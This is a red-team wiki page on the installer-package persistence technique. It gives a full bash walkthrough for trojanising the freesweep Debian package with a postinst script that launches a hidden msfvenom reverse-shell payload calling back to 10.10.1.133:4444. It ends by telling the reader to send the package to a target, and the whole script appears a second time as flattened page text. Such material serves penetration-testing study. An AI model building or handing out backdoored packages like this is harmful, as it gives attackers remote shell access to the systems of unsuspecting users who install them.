Installer Packages

Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system.

Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts.

First we need to locate a DEB package that we are going to infect with our payload will set everything in our temp folder, I've automated the process and built a small bash script to create the DEB file we send it to the user, and when the user installs

Build backdoor DEB:
sudo apt-get --download-only install freesweep
mkdir evil
sudo mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb /tmp/evil 
cd evil
dpkg -x freesweep_1.0.2-1_amd64.deb work
mkdir work/DEBIAN
cd work/DEBIAN 

# Define the content of the control file and create the file

cat <<EOL > control
Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where
 one tries to find all the mines without igniting any, based on hints given
 by the computer. Unlike most implementations of this game, Freesweep
 works in any visual text display - in Linux console, in an xterm, and in
 most text-based terminals currently in use.
EOL

# Notify the user that the file has been created
echo "The control file has been created and populated." 

# Now build a postinst file

cat <<EOL > postinst
#!/bin/sh

sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
EOL

# Tell user files are built
echo "Files built successfuly"

# Build the payload

msfvenom --platform linux -a x64 --payload linux/x64/shell_reverse_tcp LHOST=10.10.1.133 LPORT=4444 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores

echo "Payload has been built"

# Change the values

chmod 755 postinst

# Build the package

dpkg-deb --build /tmp/evil/work

# Move back 2 directories

cd ../..

# Rename file to whatever "freesweep" here

mv work.deb freesweep.deb

echo "All files created send target file FREESWEEP.DEB"

Reference:

https://www.offsec.com/metasploit-unleashed/binary-linux-trojan/

PreviousTrap NextT1543:Create or Modify System Process

Last updated 6 months ago

Was this helpful?

Build backdoor DEB: sudo apt-get --download-only install freesweep mkdir evil sudo mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb /tmp/evil cd evil dpkg -x freesweep_1.0.2-1_amd64.deb work mkdir work/DEBIAN cd work/DEBIAN # Define the content of the control file and create the file cat <<EOL > control Package: freesweep Version: 0.90-1 Section: Games and Amusement Priority: optional Architecture: i386 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com) Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use. EOL # Notify the user that the file has been created echo "The control file has been created and populated." # Now build a postinst file cat <<EOL > postinst #!/bin/sh sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep & EOL # Tell user files are built echo "Files built successfuly" # Build the payload msfvenom --platform linux -a x64 --payload linux/x64/shell_reverse_tcp LHOST=10.10.1.133 LPORT=4444 -b "\x00" -f elf -o /tmp/evil/work/usr/games/freesweep_scores echo "Payload has been built" # Change the values chmod 755 postinst # Build the package dpkg-deb --build /tmp/evil/work # Move back 2 directories cd ../.. # Rename file to whatever "freesweep" here mv work.deb freesweep.deb echo "All files created send target file FREESWEEP.DEB"